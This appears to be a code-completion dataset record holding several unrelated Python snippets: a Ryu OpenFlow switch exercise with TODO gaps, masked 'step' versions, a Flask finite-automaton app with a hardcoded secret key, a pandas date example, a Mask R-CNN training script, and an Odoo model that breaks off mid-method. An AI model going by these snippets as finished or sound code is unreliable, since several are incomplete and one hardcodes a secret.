if msg.buffer_id == ofproto.OFP_NO_BUFFER:
data = msg.data
print('PACKET_OUT...')
<|reserved_special_token_1|>
from ryu.base import app_manager
from ryu.controller import ofp_event
from ryu.controller.handler import MAIN_DISPATCHER
from ryu.controller.handler import set_ev_cls
from ryu.ofproto import ofproto_v1_0
from ryu.lib.mac import haddr_to_bin
from ryu.lib.packet import packet
from ryu.lib.packet import ethernet
from ryu.lib.packet import ether_types
class SimpleSwitch(app_manager.RyuApp):
# TODO define OpenFlow 1.0 version for the switch
# add your code here
def __init__(self, *args, **kwargs):
super(SimpleSwitch, self).__init__(*args, **kwargs)
self.mac_to_port = {}
def add_flow(self, datapath, in_port, dst, src, actions):
ofproto = datapath.ofproto
match = datapath.ofproto_parser.OFPMatch(
in_port=in_port,
dl_dst=haddr_to_bin(dst), dl_src=haddr_to_bin(src))
mod = datapath.ofproto_parser.OFPFlowMod(
datapath=datapath, match=match, cookie=0,
command=ofproto.OFPFC_ADD, idle_timeout=0, hard_timeout=0,
priority=ofproto.OFP_DEFAULT_PRIORITY,
flags=ofproto.OFPFF_SEND_FLOW_REM, actions=actions)
# TODO send modified message out
# add your code here
@set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)
def _packet_in_handler(self, ev):
msg = ev.msg
datapath = msg.datapath
ofproto = datapath.ofproto
pkt = packet.Packet(msg.data)
eth = pkt.get_protocol(ethernet.ethernet)
if eth.ethertype == ether_types.ETH_TYPE_LLDP:
# ignore lldp packet
return
if eth.ethertype == ether_types.ETH_TYPE_IPV6:
# ignore ipv6 packet
return
dst = eth.dst
src = eth.src
dpid = datapath.id
self.mac_to_port.setdefault(dpid, {})
self.logger.info("packet in DPID:%s MAC_SRC:%s MAC_DST:%s IN_PORT:%s", dpid, src, dst, msg.in_port)
# learn a mac address to avoid FLOOD next time.
self.mac_to_port[dpid][src] = msg.in_port
if dst in self.mac_to_port[dpid]:
out_port = self.mac_to_port[dpid][dst]
else:
out_port = ofproto.OFPP_FLOOD
# TODO define the action for output
# add your code here
# install a flow to avoid packet_in next time
if out_port != ofproto.OFPP_FLOOD:
self.logger.info("add flow s:DPID:%s Match:[ MAC_SRC:%s MAC_DST:%s IN_PORT:%s ], Action:[OUT_PUT:%s] ", dpid, src, dst, msg.in_port, out_port)
self.add_flow(datapath, msg.in_port, dst, src, actions)
data = None
if msg.buffer_id == ofproto.OFP_NO_BUFFER:
data = msg.data
# TODO define the OpenFlow Packet Out
# add your code here
print ("PACKET_OUT...")
|
flexible
|
{
"blob_id": "86d032a3cd67118eb46073c996f1c9a391f8dfe0",
"index": 1608,
"step-1": "<mask token>\n\n\nclass SimpleSwitch(app_manager.RyuApp):\n <mask token>\n <mask token>\n <mask token>\n print('PACKET_OUT...')\n",
"step-2": "<mask token>\n\n\nclass SimpleSwitch(app_manager.RyuApp):\n\n def __init__(self, *args, **kwargs):\n super(SimpleSwitch, self).__init__(*args, **kwargs)\n self.mac_to_port = {}\n <mask token>\n\n @set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)\n def _packet_in_handler(self, ev):\n msg = ev.msg\n datapath = msg.datapath\n ofproto = datapath.ofproto\n pkt = packet.Packet(msg.data)\n eth = pkt.get_protocol(ethernet.ethernet)\n if eth.ethertype == ether_types.ETH_TYPE_LLDP:\n return\n if eth.ethertype == ether_types.ETH_TYPE_IPV6:\n return\n dst = eth.dst\n src = eth.src\n dpid = datapath.id\n self.mac_to_port.setdefault(dpid, {})\n self.logger.info('packet in DPID:%s MAC_SRC:%s MAC_DST:%s IN_PORT:%s',\n dpid, src, dst, msg.in_port)\n self.mac_to_port[dpid][src] = msg.in_port\n if dst in self.mac_to_port[dpid]:\n out_port = self.mac_to_port[dpid][dst]\n else:\n out_port = ofproto.OFPP_FLOOD\n if out_port != ofproto.OFPP_FLOOD:\n self.logger.info(\n 'add flow s:DPID:%s Match:[ MAC_SRC:%s MAC_DST:%s IN_PORT:%s ], Action:[OUT_PUT:%s] '\n , dpid, src, dst, msg.in_port, out_port)\n self.add_flow(datapath, msg.in_port, dst, src, actions)\n data = None\n if msg.buffer_id == ofproto.OFP_NO_BUFFER:\n data = msg.data\n print('PACKET_OUT...')\n",
"step-3": "<mask token>\n\n\nclass SimpleSwitch(app_manager.RyuApp):\n\n def __init__(self, *args, **kwargs):\n super(SimpleSwitch, self).__init__(*args, **kwargs)\n self.mac_to_port = {}\n\n def add_flow(self, datapath, in_port, dst, src, actions):\n ofproto = datapath.ofproto\n match = datapath.ofproto_parser.OFPMatch(in_port=in_port, dl_dst=\n haddr_to_bin(dst), dl_src=haddr_to_bin(src))\n mod = datapath.ofproto_parser.OFPFlowMod(datapath=datapath, match=\n match, cookie=0, command=ofproto.OFPFC_ADD, idle_timeout=0,\n hard_timeout=0, priority=ofproto.OFP_DEFAULT_PRIORITY, flags=\n ofproto.OFPFF_SEND_FLOW_REM, actions=actions)\n\n @set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)\n def _packet_in_handler(self, ev):\n msg = ev.msg\n datapath = msg.datapath\n ofproto = datapath.ofproto\n pkt = packet.Packet(msg.data)\n eth = pkt.get_protocol(ethernet.ethernet)\n if eth.ethertype == ether_types.ETH_TYPE_LLDP:\n return\n if eth.ethertype == ether_types.ETH_TYPE_IPV6:\n return\n dst = eth.dst\n src = eth.src\n dpid = datapath.id\n self.mac_to_port.setdefault(dpid, {})\n self.logger.info('packet in DPID:%s MAC_SRC:%s MAC_DST:%s IN_PORT:%s',\n dpid, src, dst, msg.in_port)\n self.mac_to_port[dpid][src] = msg.in_port\n if dst in self.mac_to_port[dpid]:\n out_port = self.mac_to_port[dpid][dst]\n else:\n out_port = ofproto.OFPP_FLOOD\n if out_port != ofproto.OFPP_FLOOD:\n self.logger.info(\n 'add flow s:DPID:%s Match:[ MAC_SRC:%s MAC_DST:%s IN_PORT:%s ], Action:[OUT_PUT:%s] '\n , dpid, src, dst, msg.in_port, out_port)\n self.add_flow(datapath, msg.in_port, dst, src, actions)\n data = None\n if msg.buffer_id == ofproto.OFP_NO_BUFFER:\n data = msg.data\n print('PACKET_OUT...')\n",
"step-4": "from ryu.base import app_manager\nfrom ryu.controller import ofp_event\nfrom ryu.controller.handler import MAIN_DISPATCHER\nfrom ryu.controller.handler import set_ev_cls\nfrom ryu.ofproto import ofproto_v1_0\nfrom ryu.lib.mac import haddr_to_bin\nfrom ryu.lib.packet import packet\nfrom ryu.lib.packet import ethernet\nfrom ryu.lib.packet import ether_types\n\n\nclass SimpleSwitch(app_manager.RyuApp):\n\n def __init__(self, *args, **kwargs):\n super(SimpleSwitch, self).__init__(*args, **kwargs)\n self.mac_to_port = {}\n\n def add_flow(self, datapath, in_port, dst, src, actions):\n ofproto = datapath.ofproto\n match = datapath.ofproto_parser.OFPMatch(in_port=in_port, dl_dst=\n haddr_to_bin(dst), dl_src=haddr_to_bin(src))\n mod = datapath.ofproto_parser.OFPFlowMod(datapath=datapath, match=\n match, cookie=0, command=ofproto.OFPFC_ADD, idle_timeout=0,\n hard_timeout=0, priority=ofproto.OFP_DEFAULT_PRIORITY, flags=\n ofproto.OFPFF_SEND_FLOW_REM, actions=actions)\n\n @set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)\n def _packet_in_handler(self, ev):\n msg = ev.msg\n datapath = msg.datapath\n ofproto = datapath.ofproto\n pkt = packet.Packet(msg.data)\n eth = pkt.get_protocol(ethernet.ethernet)\n if eth.ethertype == ether_types.ETH_TYPE_LLDP:\n return\n if eth.ethertype == ether_types.ETH_TYPE_IPV6:\n return\n dst = eth.dst\n src = eth.src\n dpid = datapath.id\n self.mac_to_port.setdefault(dpid, {})\n self.logger.info('packet in DPID:%s MAC_SRC:%s MAC_DST:%s IN_PORT:%s',\n dpid, src, dst, msg.in_port)\n self.mac_to_port[dpid][src] = msg.in_port\n if dst in self.mac_to_port[dpid]:\n out_port = self.mac_to_port[dpid][dst]\n else:\n out_port = ofproto.OFPP_FLOOD\n if out_port != ofproto.OFPP_FLOOD:\n self.logger.info(\n 'add flow s:DPID:%s Match:[ MAC_SRC:%s MAC_DST:%s IN_PORT:%s ], Action:[OUT_PUT:%s] '\n , dpid, src, dst, msg.in_port, out_port)\n self.add_flow(datapath, msg.in_port, dst, src, actions)\n data = None\n if msg.buffer_id == ofproto.OFP_NO_BUFFER:\n data = msg.data\n print('PACKET_OUT...')\n",
"step-5": "from ryu.base import app_manager\nfrom ryu.controller import ofp_event\nfrom ryu.controller.handler import MAIN_DISPATCHER\nfrom ryu.controller.handler import set_ev_cls\nfrom ryu.ofproto import ofproto_v1_0\n\nfrom ryu.lib.mac import haddr_to_bin\nfrom ryu.lib.packet import packet\nfrom ryu.lib.packet import ethernet\nfrom ryu.lib.packet import ether_types\n\n\nclass SimpleSwitch(app_manager.RyuApp):\n\t# TODO define OpenFlow 1.0 version for the switch\n\t# add your code here\n\n\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(SimpleSwitch, self).__init__(*args, **kwargs)\n\t\tself.mac_to_port = {}\n \n \n\tdef add_flow(self, datapath, in_port, dst, src, actions):\n\t\tofproto = datapath.ofproto\n\n\t\tmatch = datapath.ofproto_parser.OFPMatch(\n in_port=in_port,\n dl_dst=haddr_to_bin(dst), dl_src=haddr_to_bin(src))\n\n\t\tmod = datapath.ofproto_parser.OFPFlowMod(\n datapath=datapath, match=match, cookie=0,\n command=ofproto.OFPFC_ADD, idle_timeout=0, hard_timeout=0,\n priority=ofproto.OFP_DEFAULT_PRIORITY,\n flags=ofproto.OFPFF_SEND_FLOW_REM, actions=actions)\n\t\t# TODO send modified message out\n\t\t# add your code here\n\n\t@set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)\n\tdef _packet_in_handler(self, ev):\n\t\tmsg = ev.msg\n\t\tdatapath = msg.datapath\n\t\tofproto = datapath.ofproto\n\n\t\tpkt = packet.Packet(msg.data)\n\t\teth = pkt.get_protocol(ethernet.ethernet)\n\n\t\tif eth.ethertype == ether_types.ETH_TYPE_LLDP:\n\t\t\t# ignore lldp packet\n\t\t\treturn\n\t\tif eth.ethertype == ether_types.ETH_TYPE_IPV6:\n\t\t\t# ignore ipv6 packet\n\t\t\treturn \n\t\t\n\t\tdst = eth.dst\n\t\tsrc = eth.src\n\t\tdpid = datapath.id\n\t\tself.mac_to_port.setdefault(dpid, {})\n\n\t\tself.logger.info(\"packet in DPID:%s MAC_SRC:%s MAC_DST:%s IN_PORT:%s\", dpid, src, dst, msg.in_port)\n\n\t\t# learn a mac address to avoid FLOOD next time.\n\t\tself.mac_to_port[dpid][src] = msg.in_port\n\n\t\tif dst in self.mac_to_port[dpid]:\n\t\t\tout_port = self.mac_to_port[dpid][dst]\n\t\telse:\n\t\t\tout_port = ofproto.OFPP_FLOOD\n\n\t\t# TODO define the action for output\n\t\t# add your code here\n\n\n # install a flow to avoid packet_in next time\n\t\tif out_port != ofproto.OFPP_FLOOD:\n\t\t\tself.logger.info(\"add flow s:DPID:%s Match:[ MAC_SRC:%s MAC_DST:%s IN_PORT:%s ], Action:[OUT_PUT:%s] \", dpid, src, dst, msg.in_port, out_port)\n\t\t\tself.add_flow(datapath, msg.in_port, dst, src, actions)\n\n\t\tdata = None\n\t\tif msg.buffer_id == ofproto.OFP_NO_BUFFER:\n\t\t\tdata = msg.data\n \n\n\t\t# TODO define the OpenFlow Packet Out\n\t\t# add your code here\n\n\tprint (\"PACKET_OUT...\")\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
from typing import Set, Dict, Tuple
from flask import Flask, render_template, request
app = Flask(__name__)
app.config['SECRET_KEY'] = 'top_secret'
# Определение константных величин
RULE: Dict[Tuple[str, str], str] = {('H', 'a'): 'S',
('H', 'b'): 'SE',
('S', 'b'): 'SE',
('SE', 'a'): 'SE',
('SE', 'b'): 'SE'}
INITIAL_STATE: str = 'H'
FINAL_STATE: Set[str] = {'S', 'SE'}
def finite_automate(word: str) -> str:
"""Реализация конечного автомата для проверки символьных строк"""
state: str = INITIAL_STATE
for ind, char in enumerate(word):
yield f'{word[ind:]} --> {state}'
state = RULE.get((state, char))
if not state:
break
if state in FINAL_STATE:
yield 'Цепочка принадлежит языку'
else:
yield 'Цепочка не принадлежит языку'
@app.route('/', methods=['GET', 'POST'])
def index():
res = None
if request.method == 'POST':
res = finite_automate(request.form['word'])
return render_template('index.html', res=res)
|
normal
|
{
"blob_id": "86ea1c46383b5a8790eb187163107f4100395ef3",
"index": 8962,
"step-1": "<mask token>\n\n\ndef finite_automate(word: str) ->str:\n \"\"\"Реализация конечного автомата для проверки символьных строк\"\"\"\n state: str = INITIAL_STATE\n for ind, char in enumerate(word):\n yield f'{word[ind:]} --> {state}'\n state = RULE.get((state, char))\n if not state:\n break\n if state in FINAL_STATE:\n yield 'Цепочка принадлежит языку'\n else:\n yield 'Цепочка не принадлежит языку'\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n res = None\n if request.method == 'POST':\n res = finite_automate(request.form['word'])\n return render_template('index.html', res=res)\n",
"step-2": "<mask token>\nRULE: Dict[Tuple[str, str], str] = {('H', 'a'): 'S', ('H', 'b'): 'SE', ('S',\n 'b'): 'SE', ('SE', 'a'): 'SE', ('SE', 'b'): 'SE'}\nINITIAL_STATE: str = 'H'\nFINAL_STATE: Set[str] = {'S', 'SE'}\n\n\ndef finite_automate(word: str) ->str:\n \"\"\"Реализация конечного автомата для проверки символьных строк\"\"\"\n state: str = INITIAL_STATE\n for ind, char in enumerate(word):\n yield f'{word[ind:]} --> {state}'\n state = RULE.get((state, char))\n if not state:\n break\n if state in FINAL_STATE:\n yield 'Цепочка принадлежит языку'\n else:\n yield 'Цепочка не принадлежит языку'\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n res = None\n if request.method == 'POST':\n res = finite_automate(request.form['word'])\n return render_template('index.html', res=res)\n",
"step-3": "<mask token>\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'top_secret'\nRULE: Dict[Tuple[str, str], str] = {('H', 'a'): 'S', ('H', 'b'): 'SE', ('S',\n 'b'): 'SE', ('SE', 'a'): 'SE', ('SE', 'b'): 'SE'}\nINITIAL_STATE: str = 'H'\nFINAL_STATE: Set[str] = {'S', 'SE'}\n\n\ndef finite_automate(word: str) ->str:\n \"\"\"Реализация конечного автомата для проверки символьных строк\"\"\"\n state: str = INITIAL_STATE\n for ind, char in enumerate(word):\n yield f'{word[ind:]} --> {state}'\n state = RULE.get((state, char))\n if not state:\n break\n if state in FINAL_STATE:\n yield 'Цепочка принадлежит языку'\n else:\n yield 'Цепочка не принадлежит языку'\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n res = None\n if request.method == 'POST':\n res = finite_automate(request.form['word'])\n return render_template('index.html', res=res)\n",
"step-4": "from typing import Set, Dict, Tuple\nfrom flask import Flask, render_template, request\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'top_secret'\nRULE: Dict[Tuple[str, str], str] = {('H', 'a'): 'S', ('H', 'b'): 'SE', ('S',\n 'b'): 'SE', ('SE', 'a'): 'SE', ('SE', 'b'): 'SE'}\nINITIAL_STATE: str = 'H'\nFINAL_STATE: Set[str] = {'S', 'SE'}\n\n\ndef finite_automate(word: str) ->str:\n \"\"\"Реализация конечного автомата для проверки символьных строк\"\"\"\n state: str = INITIAL_STATE\n for ind, char in enumerate(word):\n yield f'{word[ind:]} --> {state}'\n state = RULE.get((state, char))\n if not state:\n break\n if state in FINAL_STATE:\n yield 'Цепочка принадлежит языку'\n else:\n yield 'Цепочка не принадлежит языку'\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n res = None\n if request.method == 'POST':\n res = finite_automate(request.form['word'])\n return render_template('index.html', res=res)\n",
"step-5": "from typing import Set, Dict, Tuple\nfrom flask import Flask, render_template, request\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'top_secret'\n\n# Определение константных величин\nRULE: Dict[Tuple[str, str], str] = {('H', 'a'): 'S',\n ('H', 'b'): 'SE',\n ('S', 'b'): 'SE',\n ('SE', 'a'): 'SE',\n ('SE', 'b'): 'SE'}\nINITIAL_STATE: str = 'H'\nFINAL_STATE: Set[str] = {'S', 'SE'}\n\n\ndef finite_automate(word: str) -> str:\n \"\"\"Реализация конечного автомата для проверки символьных строк\"\"\"\n state: str = INITIAL_STATE\n for ind, char in enumerate(word):\n yield f'{word[ind:]} --> {state}'\n state = RULE.get((state, char))\n if not state:\n break\n\n if state in FINAL_STATE:\n yield 'Цепочка принадлежит языку'\n else:\n yield 'Цепочка не принадлежит языку'\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n res = None\n if request.method == 'POST':\n res = finite_automate(request.form['word'])\n return render_template('index.html', res=res)\n\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print(df.head())
print()
<|reserved_special_token_0|>
print(df.head())
print('------------------')
<|reserved_special_token_0|>
print(df.head())
print('------------------')
df.set_index('Date_m', inplace=True)
print(df.head())
<|reserved_special_token_1|>
<|reserved_special_token_0|>
df = pd.read_csv('../../datasets/part5/stock-data.csv')
df['new_Date'] = pd.to_datetime(df['Date'])
print(df.head())
print()
df['Year'] = df['new_Date'].dt.year
df['Month'] = df['new_Date'].dt.month
df['Day'] = df['new_Date'].dt.day
print(df.head())
print('------------------')
df['Date_yr'] = df['new_Date'].dt.to_period(freq='A')
df['Date_m'] = df['new_Date'].dt.to_period(freq='M')
print(df.head())
print('------------------')
df.set_index('Date_m', inplace=True)
print(df.head())
<|reserved_special_token_1|>
import pandas as pd
df = pd.read_csv('../../datasets/part5/stock-data.csv')
df['new_Date'] = pd.to_datetime(df['Date'])
print(df.head())
print()
df['Year'] = df['new_Date'].dt.year
df['Month'] = df['new_Date'].dt.month
df['Day'] = df['new_Date'].dt.day
print(df.head())
print('------------------')
df['Date_yr'] = df['new_Date'].dt.to_period(freq='A')
df['Date_m'] = df['new_Date'].dt.to_period(freq='M')
print(df.head())
print('------------------')
df.set_index('Date_m', inplace=True)
print(df.head())
<|reserved_special_token_1|>
#%%
### 날짜 데이터 분리
# 연-월-일 날짜 데이터에서 일부 분리 추출
import pandas as pd
df = pd.read_csv('../../datasets/part5/stock-data.csv')
# 문자열인 날짜 데이터를 판다스 Timestamp로 변환
df['new_Date'] = pd.to_datetime(df['Date']) # df에 새로운 열로 추가
print(df.head())
print()
# dt 속성을 이용하여 new_Data 열의 연-월-일 정보를 년, 월, 일로 구분
df['Year'] = df['new_Date'].dt.year
df['Month'] = df['new_Date'].dt.month
df['Day'] = df['new_Date'].dt.day
print(df.head())
print('------------------')
# Timestamp를 Period로 변환하여 연-월-일 표기 변경하기
# to_period() 메소드를 적용하여, 연-월-일 중 연-월 또는 연도를 추출
df['Date_yr'] = df['new_Date'].dt.to_period(freq='A') # 연도를 나타내는 값 저장
df['Date_m'] = df['new_Date'].dt.to_period(freq='M') # 연-월을 나타내는 값 저장
print(df.head())
print('------------------')
# 원하는 열을 행 인덱스로 지정
df.set_index('Date_m', inplace=True)
print(df.head())
# %%
|
flexible
|
{
"blob_id": "d89e1d653c6db322feb6edba93cbfc622bf47aa2",
"index": 2781,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(df.head())\nprint()\n<mask token>\nprint(df.head())\nprint('------------------')\n<mask token>\nprint(df.head())\nprint('------------------')\ndf.set_index('Date_m', inplace=True)\nprint(df.head())\n",
"step-3": "<mask token>\ndf = pd.read_csv('../../datasets/part5/stock-data.csv')\ndf['new_Date'] = pd.to_datetime(df['Date'])\nprint(df.head())\nprint()\ndf['Year'] = df['new_Date'].dt.year\ndf['Month'] = df['new_Date'].dt.month\ndf['Day'] = df['new_Date'].dt.day\nprint(df.head())\nprint('------------------')\ndf['Date_yr'] = df['new_Date'].dt.to_period(freq='A')\ndf['Date_m'] = df['new_Date'].dt.to_period(freq='M')\nprint(df.head())\nprint('------------------')\ndf.set_index('Date_m', inplace=True)\nprint(df.head())\n",
"step-4": "import pandas as pd\ndf = pd.read_csv('../../datasets/part5/stock-data.csv')\ndf['new_Date'] = pd.to_datetime(df['Date'])\nprint(df.head())\nprint()\ndf['Year'] = df['new_Date'].dt.year\ndf['Month'] = df['new_Date'].dt.month\ndf['Day'] = df['new_Date'].dt.day\nprint(df.head())\nprint('------------------')\ndf['Date_yr'] = df['new_Date'].dt.to_period(freq='A')\ndf['Date_m'] = df['new_Date'].dt.to_period(freq='M')\nprint(df.head())\nprint('------------------')\ndf.set_index('Date_m', inplace=True)\nprint(df.head())\n",
"step-5": "#%%\n\n### 날짜 데이터 분리\n# 연-월-일 날짜 데이터에서 일부 분리 추출\n\nimport pandas as pd\n\ndf = pd.read_csv('../../datasets/part5/stock-data.csv')\n\n# 문자열인 날짜 데이터를 판다스 Timestamp로 변환\ndf['new_Date'] = pd.to_datetime(df['Date']) # df에 새로운 열로 추가\nprint(df.head())\nprint()\n\n# dt 속성을 이용하여 new_Data 열의 연-월-일 정보를 년, 월, 일로 구분\ndf['Year'] = df['new_Date'].dt.year\ndf['Month'] = df['new_Date'].dt.month\ndf['Day'] = df['new_Date'].dt.day\nprint(df.head())\nprint('------------------')\n\n# Timestamp를 Period로 변환하여 연-월-일 표기 변경하기\n# to_period() 메소드를 적용하여, 연-월-일 중 연-월 또는 연도를 추출 \ndf['Date_yr'] = df['new_Date'].dt.to_period(freq='A') # 연도를 나타내는 값 저장\ndf['Date_m'] = df['new_Date'].dt.to_period(freq='M') # 연-월을 나타내는 값 저장\nprint(df.head())\nprint('------------------')\n\n# 원하는 열을 행 인덱스로 지정\ndf.set_index('Date_m', inplace=True)\nprint(df.head())\n# %%\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
train_maskRcnn.modelConfig(network_backbone='resnet101', num_classes=3,
batch_size=1)
train_maskRcnn.load_pretrained_model('c:/models/mask_rcnn_coco.h5')
train_maskRcnn.load_dataset('Object-Detection/Pixellib/customModel')
train_maskRcnn.evaluate_model('c:/models/eval')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
train_maskRcnn = instance_custom_training()
train_maskRcnn.modelConfig(network_backbone='resnet101', num_classes=3,
batch_size=1)
train_maskRcnn.load_pretrained_model('c:/models/mask_rcnn_coco.h5')
train_maskRcnn.load_dataset('Object-Detection/Pixellib/customModel')
train_maskRcnn.evaluate_model('c:/models/eval')
<|reserved_special_token_1|>
import pixellib
from pixellib.custom_train import instance_custom_training
train_maskRcnn = instance_custom_training()
train_maskRcnn.modelConfig(network_backbone='resnet101', num_classes=3,
batch_size=1)
train_maskRcnn.load_pretrained_model('c:/models/mask_rcnn_coco.h5')
train_maskRcnn.load_dataset('Object-Detection/Pixellib/customModel')
train_maskRcnn.evaluate_model('c:/models/eval')
<|reserved_special_token_1|>
# first we have to label the Banana / Apple / Tomato in the images
# we will use lables me
# pip install pyqt5
# pip install labelme
# after labeling the images. lets test it.
#Each image has a json file
import pixellib
from pixellib.custom_train import instance_custom_training
train_maskRcnn = instance_custom_training()
# num_classes=3 since we have 3 classes : Banana , Apple , Tomato
train_maskRcnn.modelConfig(network_backbone="resnet101",num_classes=3, batch_size=1)
#https://github.com/matterport/Mask_RCNN/releases
# you can download here the 2.0 version for the model
train_maskRcnn.load_pretrained_model("c:/models/mask_rcnn_coco.h5")
train_maskRcnn.load_dataset("Object-Detection/Pixellib/customModel")
# The model directory has several files in this format : mask_rcnn_model.*
# It is saved with the epoch number
# we would like to evaluate each model and find the best one
# lets test a specific model :
#train_maskRcnn.evaluate_model("c:/models/mask_rcnn_model.051-0.252276.h5")
# The evaluation for this epoch is : 0.636364
# we would like to evaluate all the models.
# since the direcroty is not empty , I will just copy all the models to a new directory .
# lets test the result of all models
train_maskRcnn.evaluate_model("c:/models/eval")
# These are the results :
# c:/models/eval\mask_rcnn_model.001-1.361029.h5 evaluation using iou_threshold 0.5 is 0.000000
# c:/models/eval\mask_rcnn_model.002-0.597196.h5 evaluation using iou_threshold 0.5 is 0.000000
# c:/models/eval\mask_rcnn_model.004-0.463875.h5 evaluation using iou_threshold 0.5 is 0.272727
# c:/models/eval\mask_rcnn_model.006-0.376810.h5 evaluation using iou_threshold 0.5 is 0.272727
# c:/models/eval\mask_rcnn_model.008-0.342451.h5 evaluation using iou_threshold 0.5 is 0.363636
# c:/models/eval\mask_rcnn_model.010-0.301472.h5 evaluation using iou_threshold 0.5 is 0.454545
# c:/models/eval\mask_rcnn_model.015-0.267621.h5 evaluation using iou_threshold 0.5 is 0.590909
# # this is the best model - since it has the high evaluate number : 0.636
# c:/models/eval\mask_rcnn_model.051-0.252276.h5 evaluation using iou_threshold 0.5 is 0.636364
# mask_rcnn_model.051-0.252276.h5 #
|
flexible
|
{
"blob_id": "cb4ca5f91c7cd47197784085258536166055afe9",
"index": 4212,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ntrain_maskRcnn.modelConfig(network_backbone='resnet101', num_classes=3,\n batch_size=1)\ntrain_maskRcnn.load_pretrained_model('c:/models/mask_rcnn_coco.h5')\ntrain_maskRcnn.load_dataset('Object-Detection/Pixellib/customModel')\ntrain_maskRcnn.evaluate_model('c:/models/eval')\n",
"step-3": "<mask token>\ntrain_maskRcnn = instance_custom_training()\ntrain_maskRcnn.modelConfig(network_backbone='resnet101', num_classes=3,\n batch_size=1)\ntrain_maskRcnn.load_pretrained_model('c:/models/mask_rcnn_coco.h5')\ntrain_maskRcnn.load_dataset('Object-Detection/Pixellib/customModel')\ntrain_maskRcnn.evaluate_model('c:/models/eval')\n",
"step-4": "import pixellib\nfrom pixellib.custom_train import instance_custom_training\ntrain_maskRcnn = instance_custom_training()\ntrain_maskRcnn.modelConfig(network_backbone='resnet101', num_classes=3,\n batch_size=1)\ntrain_maskRcnn.load_pretrained_model('c:/models/mask_rcnn_coco.h5')\ntrain_maskRcnn.load_dataset('Object-Detection/Pixellib/customModel')\ntrain_maskRcnn.evaluate_model('c:/models/eval')\n",
"step-5": "# first we have to label the Banana / Apple / Tomato in the images\n# we will use lables me\n\n# pip install pyqt5\n# pip install labelme\n\n# after labeling the images. lets test it.\n#Each image has a json file \n\nimport pixellib\nfrom pixellib.custom_train import instance_custom_training\n\ntrain_maskRcnn = instance_custom_training()\n\n# num_classes=3 since we have 3 classes : Banana , Apple , Tomato\ntrain_maskRcnn.modelConfig(network_backbone=\"resnet101\",num_classes=3, batch_size=1)\n\n#https://github.com/matterport/Mask_RCNN/releases\n# you can download here the 2.0 version for the model \ntrain_maskRcnn.load_pretrained_model(\"c:/models/mask_rcnn_coco.h5\") \ntrain_maskRcnn.load_dataset(\"Object-Detection/Pixellib/customModel\")\n\n# The model directory has several files in this format : mask_rcnn_model.*\n# It is saved with the epoch number\n\n# we would like to evaluate each model and find the best one\n\n# lets test a specific model :\n\n#train_maskRcnn.evaluate_model(\"c:/models/mask_rcnn_model.051-0.252276.h5\")\n\n# The evaluation for this epoch is : 0.636364 \n\n# we would like to evaluate all the models.\n# since the direcroty is not empty , I will just copy all the models to a new directory .\n\n# lets test the result of all models\n\ntrain_maskRcnn.evaluate_model(\"c:/models/eval\")\n\n# These are the results :\n# c:/models/eval\\mask_rcnn_model.001-1.361029.h5 evaluation using iou_threshold 0.5 is 0.000000 \n\n# c:/models/eval\\mask_rcnn_model.002-0.597196.h5 evaluation using iou_threshold 0.5 is 0.000000 \n\n# c:/models/eval\\mask_rcnn_model.004-0.463875.h5 evaluation using iou_threshold 0.5 is 0.272727 \n\n# c:/models/eval\\mask_rcnn_model.006-0.376810.h5 evaluation using iou_threshold 0.5 is 0.272727 \n\n# c:/models/eval\\mask_rcnn_model.008-0.342451.h5 evaluation using iou_threshold 0.5 is 0.363636 \n\n# c:/models/eval\\mask_rcnn_model.010-0.301472.h5 evaluation using iou_threshold 0.5 is 0.454545 \n\n# c:/models/eval\\mask_rcnn_model.015-0.267621.h5 evaluation using iou_threshold 0.5 is 0.590909 \n\n# # this is the best model - since it has the high evaluate number : 0.636\n# c:/models/eval\\mask_rcnn_model.051-0.252276.h5 evaluation using iou_threshold 0.5 is 0.636364 \n\n# mask_rcnn_model.051-0.252276.h5 #\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
print('Hello!')
<|reserved_special_token_1|>
#write a program that displays the wor "Hello!"
print("Hello!")
|
flexible
|
{
"blob_id": "b7a7941b3555b30ac7e743a5457df76f9eb7cb15",
"index": 9714,
"step-1": "<mask token>\n",
"step-2": "print('Hello!')\n",
"step-3": "#write a program that displays the wor \"Hello!\"\n\nprint(\"Hello!\")\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from odoo import api, tools, fields, models, _
import base64
from odoo import modules
class InheritUser(models.Model):
_inherit = 'pos.config'
related_pos_user = fields.One2many('pos.session.users', 'pos_config', string='Related User')
class InheritSession(models.Model):
_name = 'pos.session.users'
user = fields.Many2one('res.users')
pos_config = fields.Many2one('pos.config')
class InheritUser(models.Model):
_inherit = 'res.users'
pos_sessions = fields.Many2many('pos.config', string='Point of Sale Accessible')
@api.multi
def write(self, vals):
if 'pos_sessions' in vals:
if vals['pos_sessions'][0][2]:
self.env["pos.session.users"].search(
[('user', '=', self.id)]).unlink()
for pos_session in vals['pos_sessions'][0][2]:
self.env['pos.session.users'].create({'pos_config': pos_session, 'user': self.id})
else:
